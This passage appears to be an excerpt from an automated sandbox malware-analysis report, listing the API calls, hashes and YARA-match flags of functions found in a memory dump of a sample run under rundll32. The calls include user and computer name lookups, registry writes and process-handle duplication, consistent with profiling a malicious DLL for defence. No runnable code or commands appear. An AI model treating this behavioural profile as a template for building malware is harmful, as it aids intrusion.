                          • Opcode ID: f9fd1b56aa5b2e7b202405dd030a378d805adad29e090b0caf7c04e81eb6ef18
                          • Instruction ID: 4afb5a05e13662c1ae23f1fa774cad6dfbf487f0a2615acfa325da57c3e83ae0
                          • Instruction Fuzzy Hash: 6B314171900208BFEB209FA9EC4ABBE7FBAFF04325F204195F911A61D0D774AA54DB51
                          Uniqueness Score: -1.00%

                          APIs
                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,05B65674,00000008,?,00000010,00000001,00000000,0000003A), ref: 05B806AC
                          • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 05B806E0
                          • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 05B806E8
                          • GetLastError.KERNEL32 ref: 05B806F2
                          • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 05B8070E
                          • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 05B80727
                          • CancelIo.KERNEL32(?), ref: 05B8073C
                          • CloseHandle.KERNEL32(?), ref: 05B8074C
                          • GetLastError.KERNEL32 ref: 05B80754
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Similarity
                          • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                          • String ID:
                          • API String ID: 4263211335-0
                          • Opcode ID: c037bcd5268ffb22acf1f67a8c488c9b59493c3f45ccb9038542f42953789f7b
                          • Instruction ID: bcf5ba3f703361a0dc4f02d06d8c2d78c8375455e1b5750a3cfe5800c88fdf1f
                          • Instruction Fuzzy Hash: 77211976910218BFCB11BFA5D88D9FE7B7AFB44350B109062F916D6180DB70AA58CFA1
                          Uniqueness Score: -1.00%

                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,05B6E231,00000000,76CDF5B0,05B70348,?,00000001), ref: 05B71C25
                          • _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 05B71C3B
                          • _snwprintf.NTDLL ref: 05B71C60
                          • CreateFileMappingW.KERNEL32(000000FF,05B8A1E8,00000004,00000000,00001000,?), ref: 05B71C7C
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 05B71C8E
                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 05B71CA5
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 05B71CC6
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 05B71CCE
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Similarity
                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                          • String ID:
                          • API String ID: 1814172918-0
                          • Opcode ID: 1c2ece6d59aadc98647810ee12e35c14698116d99f1f367eb89339d80bcf22de
                          • Instruction ID: a0e3479f24a72f74c7fce7f214f70e55061850b692b9f50d2f9822cca5b85cb7
                          • Instruction Fuzzy Hash: ED21A876640208BBD721EFA8CC06FAD7BBABB44750F254061F615EB2C0EA70F505D760
                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlenW.KERNEL32(00000000,?,05FB9A2B,?,?,05FB9A2B,?,?,05FB9A2B,?,?,05FB9A2B,?,00000000,00000000,00000000), ref: 05B7CC58
                          • lstrcpyW.KERNEL32(00000000,?), ref: 05B7CC7B
                          • lstrcatW.KERNEL32(00000000,00000000), ref: 05B7CC83
                          • lstrlenW.KERNEL32(00000000,?,05FB9A2B,?,?,05FB9A2B,?,?,05FB9A2B,?,?,05FB9A2B,?,?,05FB9A2B,?), ref: 05B7CCCE
                          • memcpy.NTDLL(00000000,?,?,?), ref: 05B7CD36
                          • LocalFree.KERNEL32(?,?), ref: 05B7CD4F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Similarity
                          • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                          • String ID: P
                          • API String ID: 3649579052-3110715001
                          • Opcode ID: c96ccf8c08bbc3e69495fcb29c150222293d76b4fc23260c7e5eb8e7108f9232
                          • Instruction ID: f833d5e4fe9237b3194ea02a922adc56ffaffa7cbd0419326c7042b076747f03
                          • Instruction Fuzzy Hash: 20611B71A0010EAFCF10EFA4D88A9BE7FBAFB45614B155069F515A7250EB34BE05CB60
                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B8148E: InterlockedIncrement.KERNEL32(00000018), ref: 05B814DF
                            • Part of subcall function 05B8148E: RtlLeaveCriticalSection.NTDLL(05FBC398), ref: 05B8156A
                          • OpenProcess.KERNEL32(00000410,B8F475FF,05B72289,00000000,00000000,05B72289,0000001C,00000000,00000000,?,?,?,05B72289), ref: 05B7C5BD
                          • CloseHandle.KERNEL32(00000000,00000000,00000000,05B72299,00000104,?,?,?,05B72289), ref: 05B7C5DB
                          • GetSystemTimeAsFileTime.KERNEL32(05B72289), ref: 05B7C643
                          • lstrlenW.KERNEL32(C78BC933), ref: 05B7C6B8
                          • GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 05B7C6D4
                          • memcpy.NTDLL(00000014,C78BC933,00000002), ref: 05B7C6EC
                            • Part of subcall function 05B6F307: RtlLeaveCriticalSection.NTDLL(?), ref: 05B6F384
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Similarity
                          • API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
                          • String ID: o
                          • API String ID: 2541713525-252678980
                          • Opcode ID: f2578f1401948940ae2eaae36e7fa6d98e250dbcbde9d169e57267cd6624fed9
                          • Instruction ID: ac2aed8f89e2eff68d1af4641ed459fa2bc9c8f678640348051d3a637bc73314
                          • Opcode Fuzzy Hash: f2578f1401948940ae2eaae36e7fa6d98e250dbcbde9d169e57267cd6624fed9
                          • Instruction Fuzzy Hash: E551BE7161060AABDB20DF64D889BBABBA9FF08700F1015A9E516D7240EB74FD80CB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 05B6A391
                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 05B6A3BD
                          • _allmul.NTDLL(?,?,FFFFD8F0,000000FF), ref: 05B6A3CD
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,FFFFD8F0,000000FF), ref: 05B6A405
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,FFFFD8F0,000000FF), ref: 05B6A427
                          • GetShellWindow.USER32 ref: 05B6A436
                            • Part of subcall function 05B72986: GetShellWindow.USER32 ref: 05B729A4
                            • Part of subcall function 05B72986: GetVersion.KERNEL32 ref: 05B72A46
                            • Part of subcall function 05B72986: GetVersion.KERNEL32 ref: 05B72A54
                          • GetLastError.KERNEL32(?), ref: 05B6A521
                          • CloseHandle.KERNEL32(?), ref: 05B6A535
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: TimerWaitable$ShellVersionWindow$CloseCreateErrorHandleLastMultipleObjectsWait_allmul
                          • String ID:
                          • API String ID: 2436285880-0
                          • Opcode ID: 684a04dba60dd7019a0bee4c9ce60210a0a69a96164a6f0a2618dd57de21b62e
                          • Instruction ID: 0b698b1fe0fdf63794fe2427189b6bbb33ebaf1cf44486237423f568dccc92c6
                          • Opcode Fuzzy Hash: 684a04dba60dd7019a0bee4c9ce60210a0a69a96164a6f0a2618dd57de21b62e
                          • Instruction Fuzzy Hash: BE7147B1508305EFCB10EF64C888D6BBBE9FB88254F104A6EF595E3290D734E945CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B7B7A4: RegCreateKeyA.ADVAPI32(80000001,05FBB7F0,?), ref: 05B7B7B9
                            • Part of subcall function 05B7B7A4: lstrlen.KERNEL32(05FBB7F0,00000000,00000000,00000000,?,05B7A2EB,00000001,?,00000000,00000000,00000000,?,05B6109E,05B89F2C,00000008,00000003), ref: 05B7B7E2
                          • RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 05B67AA6
                          • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 05B67ABE
                          • HeapFree.KERNEL32(00000000,?,?,05B787CC,?,?), ref: 05B67B20
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B67B34
                          • WaitForSingleObject.KERNEL32(00000000,?,05B787CC,?,?), ref: 05B67B86
                          • HeapFree.KERNEL32(00000000,?,?,05B787CC,?,?), ref: 05B67BAF
                          • HeapFree.KERNEL32(00000000,?,?,05B787CC,?,?), ref: 05B67BBF
                          • RegCloseKey.ADVAPI32(?,?,05B787CC,?,?), ref: 05B67BC8
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                          • String ID:
                          • API String ID: 3503961013-0
                          • Opcode ID: dcfd79a394bab74c8994028292d310048fd1e82a8706810e493b2b32d0aa4885
                          • Instruction ID: 23de35573e45e202f71a9c07a69bcc623f488d42d54299ce032a1bfc84b3ab05
                          • Opcode Fuzzy Hash: dcfd79a394bab74c8994028292d310048fd1e82a8706810e493b2b32d0aa4885
                          • Instruction Fuzzy Hash: B341B5B5D10119FFDF119FA4C8858FEBF7AFF08218F1444AAF515A2210DA39AA94EF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,05B6A1A1), ref: 05B6AAC5
                          • wsprintfA.USER32 ref: 05B6AAED
                          • lstrlen.KERNEL32(?), ref: 05B6AAFC
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          • wsprintfA.USER32 ref: 05B6AB3C
                          • wsprintfA.USER32 ref: 05B6AB71
                          • memcpy.NTDLL(00000000,?,?), ref: 05B6AB7E
                          • memcpy.NTDLL(00000008,05B853E8,00000002,00000000,?,?), ref: 05B6AB93
                          • wsprintfA.USER32 ref: 05B6ABB6
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                          • String ID:
                          • API String ID: 2937943280-0
                          • Opcode ID: ae943b3d544bed56733d9ac223921c10d1440805a7d5a5943a9f92af99ae2cb8
                          • Instruction ID: 4456f767ec71de9cef8f8b2a381779dad29b5ab294de6987fe10725887d1873a
                          • Opcode Fuzzy Hash: ae943b3d544bed56733d9ac223921c10d1440805a7d5a5943a9f92af99ae2cb8
                          • Instruction Fuzzy Hash: 00410A71A00209EFDB14EFA8D885EAAB7FDEF44208B144495F919E7251EA34FA05CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetUserNameW.ADVAPI32(00000000,?), ref: 05B816F0
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B81703
                          • GetUserNameW.ADVAPI32(00000000,?), ref: 05B81715
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,05B76C8E), ref: 05B81739
                          • GetComputerNameW.KERNEL32(00000000,?), ref: 05B81747
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B8175E
                          • GetComputerNameW.KERNEL32(00000000,?), ref: 05B8176F
                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,05B76C8E), ref: 05B81795
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapName$AllocateComputerFreeUser
                          • String ID:
                          • API String ID: 3239747167-0
                          • Opcode ID: 87268e253d83c6bffa8dd6f25c613479b14f5c7622aa38cd0ecc18baa3be6f23
                          • Instruction ID: fa9959043beb28ce0352d7d715798cadb660562dba30948ce50e85e4e59bf239
                          • Opcode Fuzzy Hash: 87268e253d83c6bffa8dd6f25c613479b14f5c7622aa38cd0ecc18baa3be6f23
                          • Instruction Fuzzy Hash: C931E9B6A10109AFDB10EFB8D9858BEBBFAFB44254B109469E905D7200DB34FA45DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,05B6A7C4,?,?,?,?), ref: 05B763F5
                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05B76407
                          • wcstombs.NTDLL ref: 05B76415
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,05B6A7C4,?,?,?), ref: 05B76439
                          • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 05B7644E
                          • mbstowcs.NTDLL ref: 05B7645B
                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,05B6A7C4,?,?,?,?,?), ref: 05B7646D
                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,05B6A7C4,?,?,?,?,?), ref: 05B76487
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                          • String ID:
                          • API String ID: 316328430-0
                          • Opcode ID: 43418909f7157591df3c97acdfc77b66ffe3e8744fc588b73c64b708187622fb
                          • Instruction ID: f9b1fcafa607e497aa21eed707b39a1d7e83e18000ec9b68dbb727a057e39597
                          • Opcode Fuzzy Hash: 43418909f7157591df3c97acdfc77b66ffe3e8744fc588b73c64b708187622fb
                          • Instruction Fuzzy Hash: D121503151020AFFDF219FA4DC0AEAE7FBAFB44314F104165F615A60A0DB71E964EB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(05B7E453,00000000,00000000,05B8A440,?,?,05B6F68B,05B7E453,00000000,05B7E453,05B8A420), ref: 05B6D935
                          • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 05B6D943
                          • wsprintfA.USER32 ref: 05B6D95F
                          • RegCreateKeyA.ADVAPI32(80000001,05B8A420,00000000), ref: 05B6D977
                          • lstrlen.KERNEL32(?), ref: 05B6D986
                          • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 05B6D994
                          • RegCloseKey.ADVAPI32(?), ref: 05B6D99F
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B6D9AE
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
                          • String ID:
                          • API String ID: 1575615994-0
                          • Opcode ID: 246f91293853e62ef4f8b2737c98cff0157a52ae5b8c2f23e133414c1aed34c8
                          • Instruction ID: 97d6ef71cc8f7c591f5b14a3262dace79e5910aad8656703dacab0721cc32d68
                          • Opcode Fuzzy Hash: 246f91293853e62ef4f8b2737c98cff0157a52ae5b8c2f23e133414c1aed34c8
                          • Instruction Fuzzy Hash: D8111B32210108BFEF115B94EC4AEBA3F7EEB49754F145021FA0597150DA71BD54EBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • OpenProcess.KERNEL32(00000040,00000000,?), ref: 05B7FE12
                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 05B7FE30
                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05B7FE38
                          • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 05B7FE56
                          • GetLastError.KERNEL32 ref: 05B7FE6A
                          • RegCloseKey.ADVAPI32(?), ref: 05B7FE75
                          • CloseHandle.KERNEL32(00000000), ref: 05B7FE7C
                          • GetLastError.KERNEL32 ref: 05B7FE84
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                          • String ID:
                          • API String ID: 3822162776-0
                          • Opcode ID: c00ca34a84c106f1db302fef6e9e7b5917b625ad31c28e88655bd533a9f366d0
                          • Instruction ID: 5197f9616a7d006f462771d68744fb72cfeb768d0f916d6a7af8afbb63eec8af
                          • Opcode Fuzzy Hash: c00ca34a84c106f1db302fef6e9e7b5917b625ad31c28e88655bd533a9f366d0
                          • Instruction Fuzzy Hash: 54115B76150208BFDB119FA4D849ABA3F6AFB48661F146020FA16C6281DF31E954CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: b82f4508ca462c08fe032bde3792c65daf0c50d760bbb2eddcee7be4d6da9e85
                          • Instruction ID: cdf4764f512aece46d77e3b2f80f92e1b43aff1693e67ce0382226448e8069da
                          • Opcode Fuzzy Hash: b82f4508ca462c08fe032bde3792c65daf0c50d760bbb2eddcee7be4d6da9e85
                          • Instruction Fuzzy Hash: ACB10F71D00219EFDF21EFA4C948ABEBBBAFF05314F1440A1E911B7260D739AA44DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • memcpy.NTDLL(?,?,0000000D,?,?,00000000,?,?,?,?,?,?,?,?,05B82801,?), ref: 05B8242E
                          • memcpy.NTDLL(?,?,0000000D,?,?,0000000D,?,?,00000000), ref: 05B8243B
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • memcpy.NTDLL(00000000,?,?,00000008,?,00000001,05B82801,00000000,00000001,?,?,?,?,05B82801,?,00000000), ref: 05B825C9
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memcpy$AllocateHeap
                          • String ID:
                          • API String ID: 4068229299-0
                          • Opcode ID: f4370e48c59eeed51cfaa5eea3ed8961160a10b6b943c2995366334bae2771dc
                          • Instruction ID: 3549802bbf2fe01a20d10530a9804552f4793e4bc81ef0110dc4cfec95878bd9
                          • Opcode Fuzzy Hash: f4370e48c59eeed51cfaa5eea3ed8961160a10b6b943c2995366334bae2771dc
                          • Instruction Fuzzy Hash: BCB12D7960020AABDF11EF95CD84EFEBBA9FF04200F1451A5F915AB250EB34FA15CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetCommandLineA.KERNEL32(05B860F0,00000038,05B6E22A,00000000,76CDF5B0,05B70348,?,00000001,?,?,?,?,?,?,?,05B69100), ref: 05B6BA7C
                          • StrChrA.SHLWAPI(00000000,00000020,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B6BA8D
                            • Part of subcall function 05B6D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,05B6DA7B,?), ref: 05B6D4E3
                            • Part of subcall function 05B6D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 05B6D506
                            • Part of subcall function 05B6D4DA: memset.NTDLL ref: 05B6D515
                          • ExitProcess.KERNEL32 ref: 05B6BC6F
                            • Part of subcall function 05B6A8E9: StrChrA.SHLWAPI(00000020,?,765BD3B0,05FBC304,00000000,?,05B66584,?), ref: 05B6A90E
                            • Part of subcall function 05B6A8E9: StrTrimA.SHLWAPI(00000020,05B85FCC,00000000,?,05B66584,?), ref: 05B6A92D
                            • Part of subcall function 05B6A8E9: StrChrA.SHLWAPI(00000020,?,?,05B66584,?), ref: 05B6A939
                          • lstrcmp.KERNEL32(?,?), ref: 05B6BAFB
                          • VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,?,?,?,?,?,?,05B69100,?), ref: 05B6BB13
                            • Part of subcall function 05B64BC4: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,05FBB7F0,?,?,05B7B7F2,0000003A,05FBB7F0,?,05B7A2EB,00000001,?,00000000,00000000), ref: 05B64C04
                            • Part of subcall function 05B64BC4: CloseHandle.KERNEL32(000000FF,?,?,05B7B7F2,0000003A,05FBB7F0,?,05B7A2EB,00000001,?,00000000,00000000,00000000,?,05B6109E,05B89F2C), ref: 05B64C0F
                          • VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,?,?,?,?,?,?,05B69100,?), ref: 05B6BB85
                          • lstrcmp.KERNEL32(?,?), ref: 05B6BB9E
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
                          • String ID:
                          • API String ID: 739714153-0
                          • Opcode ID: c8ec70eb1fe54d92bd6e7f5876206747d96be62e8598d1d0f77e26a44f89f8f2
                          • Instruction ID: 3c46796424307c3ec738f5a56d4c5b271f451fde16a861bde21b262aa0a4d365
                          • Opcode Fuzzy Hash: c8ec70eb1fe54d92bd6e7f5876206747d96be62e8598d1d0f77e26a44f89f8f2
                          • Instruction Fuzzy Hash: FB511B71A10219AFDF21ABA4CC99DBEBBBAFF09700F1444A5F101E6154DB39B941CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 05B794B7
                          • StrTrimA.SHLWAPI(00000000,?), ref: 05B794D4
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B79507
                          • RtlImageNtHeader.NTDLL(00000000), ref: 05B79532
                          • HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 05B795F7
                            • Part of subcall function 05B6D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,05B6DA7B,?), ref: 05B6D4E3
                            • Part of subcall function 05B6D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 05B6D506
                            • Part of subcall function 05B6D4DA: memset.NTDLL ref: 05B6D515
                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 05B795A8
                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 05B795D7
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                          • String ID:
                          • API String ID: 239510280-0
                          • Opcode ID: 1d3d7aee2fbaa9b237ab845c9704cfed2fc7e8774c6da09003be111e836c0dcc
                          • Instruction ID: ce604a9498158913cb7ab8b958d386b5ae5e6dbf49cc1d8655779291f91b8d22
                          • Opcode Fuzzy Hash: 1d3d7aee2fbaa9b237ab845c9704cfed2fc7e8774c6da09003be111e836c0dcc
                          • Instruction Fuzzy Hash: 6D41B131704219BFDB229B94CC89FBE7FAAEF44750F1000A5FA15AB280DB75BA45D790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,05B61785,?,?,?,?,?), ref: 05B7D6F2
                          • lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,05B61785,?,?,?,?,?), ref: 05B7D710
                          • RtlAllocateHeap.NTDLL(00000000,76C86985,?), ref: 05B7D73C
                          • memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,05B61785,?,?,?,?,?), ref: 05B7D753
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7D766
                          • memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,05B61785,?,?,?,?,?), ref: 05B7D775
                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,00000001,00000001,?,05B61785,?,?,?), ref: 05B7D7D9
                            • Part of subcall function 05B6F307: RtlLeaveCriticalSection.NTDLL(?), ref: 05B6F384
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                          • String ID:
                          • API String ID: 1635816815-0
                          • Opcode ID: 86cb7209bf07cfa6a26bb39b7301aa37d7687a2ff586189f972c2ecbe5d42a99
                          • Instruction ID: 40390f8d85a10acaf2ef16d7feec067f82651d04d34e6bb2adbd5445a0a5124a
                          • Opcode Fuzzy Hash: 86cb7209bf07cfa6a26bb39b7301aa37d7687a2ff586189f972c2ecbe5d42a99
                          • Instruction Fuzzy Hash: 33416D31600218AFDB22AFA8CC88AAEBBA5FF04390F1545E5F815A7150D774FA54EBD0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlImageNtHeader.NTDLL ref: 05B745B6
                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 05B745F9
                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05B74614
                          • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 05B7466A
                          • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 05B746C6
                          • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 05B746D4
                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05B746DF
                            • Part of subcall function 05B626D3: RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 05B626E7
                            • Part of subcall function 05B626D3: memcpy.NTDLL(00000000,?,?,?), ref: 05B62710
                            • Part of subcall function 05B626D3: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 05B62739
                            • Part of subcall function 05B626D3: RegCloseKey.ADVAPI32(?), ref: 05B62764
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
                          • String ID:
                          • API String ID: 3181710096-0
                          • Opcode ID: fe2cd78193e403eeb2ee6422d8b39604caeccd390bd364f19acfc76fadefcdbe
                          • Instruction ID: 71f31221569613ca56f7f124d077b6bef4703188b2f284ae435c470ef96f1feb
                          • Opcode Fuzzy Hash: fe2cd78193e403eeb2ee6422d8b39604caeccd390bd364f19acfc76fadefcdbe
                          • Instruction Fuzzy Hash: F441BD72214209AFDF219F64D88AF7A3BAAFF40752F1440A5F916DB180DB70F941DB98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 05B81AED
